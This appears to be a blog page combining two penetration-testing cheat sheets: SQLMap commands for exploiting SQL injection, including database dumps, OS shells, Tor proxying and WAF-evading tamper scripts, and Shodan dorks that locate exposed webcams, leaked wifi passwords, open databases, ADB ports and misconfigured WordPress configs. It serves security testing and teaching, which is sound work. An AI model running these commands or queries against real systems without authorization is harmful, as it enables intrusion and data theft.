SQLMap Cheat Sheet 

Sqlmap is one of the best SQL injection tools. In this SQLMap cheat sheet, I will describe all the SQLMap commands that can be very helpful for test the SQL injection vulnerabilities.

I am sharing SQLMap cheat sheet created for my personal use, Hope the included payloads will help you with your penetration testing activities.

sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

Simple Usage

If you don’t know anything about the target site then use the normal command first, Observe if the sqlmap found something juicy for you

sqlmap -u “https://target_site.com/page/”

Automatic GET request parameter

sqlmap -u “https://target_site.com/page?p1=value1&p2=value2”

Specify the GET request parameters to Exploit

You can specify on which parameter you want to check or exploit the sql injection using just “-p” flag.

sqlmap -u “https://target_site.com/page?p1=value1&p2=value2” -p p1

Use POST requests (Test All parameters)

sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2"

SQLMap Request file as input

You can specify a request file containing the HTTP request, You can get it quickly from BurpSuite.

sqlmap -r request.txt

Here you can specify the targeted parameter or sqlmap will recognize and will test for all the parameters found.

Specify Custom Position in HTTP request file

You can use asterisk sign(*) to specify which parameter to attack or which place of the request to be attacked. You can specify or mark any part of the request by this method.

Use Authenticated Session With Cookie

sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --cookie="Session_Cookie_Value"

Use Authenticated Session with Auth Headers

sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --headers="Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l"

Basic Authentication

sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --auth-type=basic --auth-cred=username:password

Use Previously created Session as SQLmap input (-s)

If you got SQL injection positive somewhere, then sqlmap will automatically create a session file(.sqlite) for later use. Now, If you want to try some other commands later, you can use the session file directly (It will save your time to re-try all the possible payloads and identify the vulnerability and all.)

sqlmap -u “https://target_site.com/page?p1=value1" -s SESSION-FILE.sqlite --dbs

You can use this file from the home path of sqlmap tool’s output directory.

---

Post Exploitation Commands

If the SQL injection vulnerability observed positive then you can use the following commands to Exploit the SQL injection vulnerability.

List the Databases

sqlmap -u “https://target_site.com/page?p1=value1” --dbs

List Tables of Database TARGET_DB

sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB --tables

List Columns of Table TARGET_TABLE of Database TARGET_DB

sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE --columns

Dump Specific Data of Columns of Table TARGET_TABLE of Database TARGET_DB

sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE -C "Col1,Col2" --dump

Fully Dump Table TARGET_TABLE of Database TARGET_DB

sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE --dump

Dump full Database

sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB --dump

Custom SQL query

sqlmap -u “https://target_site.com/page?p1=value1” --sql-query "SELECT * FROM TARGET_DB;"

Get OS Shell

sqlmap -u “https://target_site.com/page?p1=value1” --os-shell

Get SQL shell

sqlmap -u “https://target_site.com/page?p1=value1” --sqlmap-shell

SQLMap Proxy

Proxy through Burpsuite

sqlmap -u “https://target_site.com/page?p1=value1” --proxy="http://127.0.0.1:8080/"

Use Tor Socks5 proxy

sqlmap -u “https://target_site.com/page?p1=value1” --tor --tor-type=SOCKS5 --check-tor --dbs

---

Extra

Specify The Database Type

sqlmap -u “https://target_site.com/page?p1=value1” --dbms=mysql

You can use other DBMS types like MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, Percona, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, etc.

Attack Techniques

–technique Specify a letter or letters of BEUSTQ to control the exploit attempts:

• B: Boolean-based blind
• E: Error-based
• U: Union query-based
• S: Stacked queries
• T: Time-based blind
• Q: Inline queries

sqlmap -u “https://target_site.com/page?p1=value1” --technique=BEUSTQ

Specify the Injection Techniques

You can specify the difficulty levels using two flags,

1. –level = LEVEL     Level of tests to perform (1-5, default 1)
2. –risk=RISK         Risk of tests to perform (0-3, default 1)

sqlmap -u “https://target_site.com/page?p1=value1” --risk=3 --level=5

Option: --risk

This option requires an argument that specifies the risk of tests to perform. There are three risk values.

–riks=1: 1 is default value which is for the majority of SQL injection points.

–riks=2: Adds to the default level the tests for heavy query time-based SQL injections

–riks=3: Value 3 adds also OR-based SQL injection tests.

Option: --level

When the value of --level is >= 2 it tests also HTTP Cookie header values. When this value is >= 3 it tests also HTTP User-Agent and HTTP Referer header value for SQL injections.

Use Default Options for the process

Use –batch flag to use all the default options or used for non-interactive sessions. (By specifying –batch flag, sqlmap will not ask you for the (Y/N) choice rather then it will smartly choose according to the needs.)

sqlmap -u “https://target_site.com/page?p1=value1” --batch

–force-ssl flag

Force SQLmap to use SSL or TLS for its requests.

Error: Can’t establish SSL connection

If you getting the following error during testing then you can use the flag –force-ssl to force SQLMap to use SSL or TLS.

Tamper Scripts

You can use the tamper scripts to bypass WAF or to modify the payload. You can use multiple tampering scripts at once using –tamper flag.

sqlmap -u “https://target_site.com/page?p1=value1” --tamper=charencode

For General Perpose Usecase:

--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL:

--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dsash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL:

--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

OR You can create your own Custom Tamper script to overcome the issue of some type of Encrypted payloads like AES, DES, Hashing, etc. I have written a different article. Check out, Make Custom SQLMAP tamper script for encrypted data Testing

Conclusion:

SQLMap is a fantastic tool for SQL Injection attacks. By analyzing the above cheat sheet we can create a general-purpose command to use most useful flags in it,

sqlmap -u “https://target_site.com/page/”--proxy="http://127.0.0.1:8080/" --cookie=”SESSID=lred0jr6na1vmci;” --data=”p1=value1” -p p1 --level=5 --risk=3 --dbms=mysql --technique=BEUSTQ --force-ssl

As always I hope you found this SQLMap cheat sheet useful. Guys, feel free to show the post some love and share the cheat sheet to your friends and colleagues. I will also post in a detailed SQLMap tutorial soon.

References

• http://sqlmap.org/
• https://tools.kali.org/vulnerability-analysis/sqlmap
• https://gitlab.com/kalilinux/packages/sqlmap

 

Shodan Cheat Sheet: Keep IoT in your Pocket

Shodan Dorks that will help you to use the Shodan search engine like a pro. It will help you to get targeted results easily.

It is very different than content search engines like Google, Bing, or Yahoo. This type of search engines crawl for data on web pages and then index it for searching while Shodan interrogates ports and grabs the resulting banners, then indexes the banners for searching.

If you are in the Cybersecurity field, you should well known about the Shodan search engine. Shodan is an IoT search engine that helps find specific types of computers (routers, webcams, servers, etc.) on the internet using a variety of filters. It’s a great resource to provide passive reconnaissance on a target or as a measuring tool.

Just open https://shodan.io/ and start firing the commands from this shodan cheat sheet.

Shodan Cheat Sheet

Server:

Find the devices or servers that contain a specific server header flag. You can research for vulnerable servers.

server: "apache 2.2.3"

or you can use directly the flag

apache 2.2.3

hostname:

Find devices with specific hostname worldwide. The hostname is a label that’s assigned to a device connected to a network that is used to spot the device in various kinds of transmission, like World Wide Web. You can use multiple filters altogether included in the shodan cheat sheet to narrow your search.

server: "apache" hostname:"google"

net:

Find devices or machines based on an IP address or /x CIDR. This filter can also be used to find the IP range or certain IP address and subnet mask.

net:34.98.0.0/16

os:

Find devices based on the operating system. You can find all the devices that have some specific operating systems. It will help penetration testers to find for vulnerable machines with specific operating system filter.

os:"windows xp"

port:

Find devices based on open ports. “port” filter will allow narrows the search the machines with some specific open ports.

proftpd port:21

org:

This filter will allows you to locate the devices of any specific organizations.

org:"Google"

You can use multiple filters shown in the shodan cheat sheet with org filter to narrow the search or sort the results among the millions.

city:

Find devices in a particular city. For example, if you want to narrow the search for Mumbai city only then you can use,

city:"Mumbai"

country:

Find devices in a particular country. For example, if you want to narrow the search for India only then you can use,

country:"IN"

geo:

Find devices by giving geographical coordinates according to certain longitudes and latitudes that are within a given radius.

geo:"48.1667,-100.1667"

before/after:

The ‘after’ and ‘before’ filter helps you to devices after and before a particular date.

The format allowed is dd/mm/yyyy

nginx before:13/04/2020 after:13/04/2018

has_screenshot

This filter will only returns results that have a screenshot available.

has_screenshot:true city:"George Town"

Wifi Passwords:

Helps to find the cleartext wifi passwords in Shodan.

html:"def_wirelesspassword"

Surveillance Cams:

Get the data for surveillance cams with username: admin and password: password

NETSurveillance uc-httpd

Or you can also use below command

Android Webcam Server

Citrix:

Find Citrix Gateway.

title:"citrix gateway"

Windows RDP Password:

But may contain secondary windows auth

"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"

Misconfigured WordPress Sites:

The wp-config.php if accessed can give out the database credentials.

http.html:"* The wp-config.php creation script uses this file"

You can access the main wordpress configuration file and capture sensitive information like credentials or AUTH_KEY of misconfigured site.

Mongo DB servers:

This dork filter will give you info about mongo DB servers.

"MongoDB Server Information" port:27017 -authentication

FTP servers allowing anonymous access:

Get the data for fully Anonymous access.

"220" "230 Login successful." port:21

Jenkins:

Find for all Jenkins Unrestricted Dashboard

x-jenkins 200

Open ATM:

This filter will allow for ATM Access availability.

NCR Port:"161"

Android Root Bridge:

Find android root bridges with port 5555.

"Android Debug Bridge" "Device" port:5555

Telnet Access:

Find devices that required password for telnet access.

port:23 console gateway

Etherium Miners:

Shows the miners running ETH.

"ETH - Total speed"

Shodan Command-Line Interface Cheat Sheet

The shodan command-line interface (CLI) is a command-line library for Shodan IoT search engine. You can install using this simple python’s pip command,

$  pip install shodan

Once the shodan tool is installed you need to initialize the environment variable with the private API key, you can get form shodan account settings.

$  shodan init PRIVATE_API_KEY

Shodan CLI Cheat Sheet

you can run just shodan command to get the help. This is most popular command, will give you the full list of commands that can be used futher for recon process.

$  shodan

myip

This command will provide users public internet-facing ip address.

$ shodan myip
49.34.120.0

host

Get the information about the host. You can get information like where it’s located, what ports are open, and which organization owns the IP.

$  shodan host shodan host 63.X.X.X

count

It will Returns the number of results for a search query.

$  shodan count Apache Tomcat/8.5.13
106
$  shodan port:22 country:IN
348612

search

Shodan search command lets you search Shodan and view the results in a terminal-friendly and user friendly way. By default it will display data of fields in specific format of (the IP, port, hostnames and data). You can use the –fields parameter to specify the fields you want to view the result in.

*Note: You need “Shodan Pro” to use this command.

$  shodan search --fields ip_str,port,org Apache Tomcat/8.5.13

download

Search for Shodan results and download the results into a file that is JSON formated banner lines.

By default the limit of results is set to 1,000 results, if you want to download more than that then you can use –limit flag with your query.

Shodan command it lets you save the results in file and you can process them afterwards using the parse command.

$  shodan download Apache Tomcat/8.5.13

parse

You can use parse command to analyze a file that was generated using the download command. Shodan command line interface lets you filter out the fields that you’re interested in, convert the JSON to use defined format.

Use –fields flags to specify the fields you are interested in. Flag –separator can be used for specify the use defined separator between the fields specified.

$  shodan parse --fields ip_str,port,org --separator " - " Apache.json.gz

*Note: You need “Shodan Pro” to use some of above shodan command line commands.

Final Words,

You can use all these all shodan filters for your recon research and penetration testing works. This filter can be used as advanced filters by using combined multiple filters together.

IMPORTANT THINGS TO REMEMBER

– You will not misuse the information to gain unauthorized access.
– This Shodan Cheat Sheet is shared with you guys for educational purposes and your penteration testing work only.
– This information shall only be used to expand knowledge and not for any type of malicious attacks.

Reference

• https://help.shodan.io/the-basics/search-query-fundamentals
• https://github.com/thedarksource/shodan-dorks
• https://developer.shodan.io/api/banner-specification